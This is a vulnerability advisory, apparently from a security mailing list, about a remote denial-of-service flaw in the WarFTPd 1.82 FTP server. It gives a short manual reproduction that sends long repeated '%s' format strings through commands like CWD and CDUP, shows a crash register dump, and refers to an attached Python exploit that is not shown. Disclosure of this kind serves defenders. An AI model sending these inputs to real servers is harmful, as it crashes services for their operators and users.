WarFTPd 1.82.00-RC11 Remote Denial Of Service --------------------------------------------- WarFTPd is vulnerable to a DOS condition when passing to various commands a long string with two times the "%s" character(s) inside. It looks as non exploitable as the problem crashes with the same output at the same instruction and address regarding or regardless of the buffer size and the %${char} passed. Maybe another one founds it vulnerable. Example: $ ftp target (Banner) ftp> quote user anonymous ftp> quote pass bla ftp> cwd %s*256 or ftp> cdup %s*256 Server will crash as follows: EAX 00000001 ECX 00000073 EDX 00000002 EBX 0079E890 ESP 0079E7A0 EBP 00A55A8A ASCII "s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s characters)" ESI 0079E7DE EDI 0000000A EIP 00431540 war-ftpd.00431540 00431540 8A08 MOV CL,BYTE PTR DS:[EAX] Only one shoot is needed. Any file related operation will crash. It was found during an ftp fuzzing session. The following commands found vulnerables (at least): CWD CDUP DELE NLST LIST SIZE Well, any file related operation. Attached goes a Python exploit. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact ------- Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<>>>>es ______________________________________________ LLama Gratis a cualquier PC del Mundo. Llamadas a fijos y móviles desde 1 céntimo por minuto. http://es.voice.yahoo.com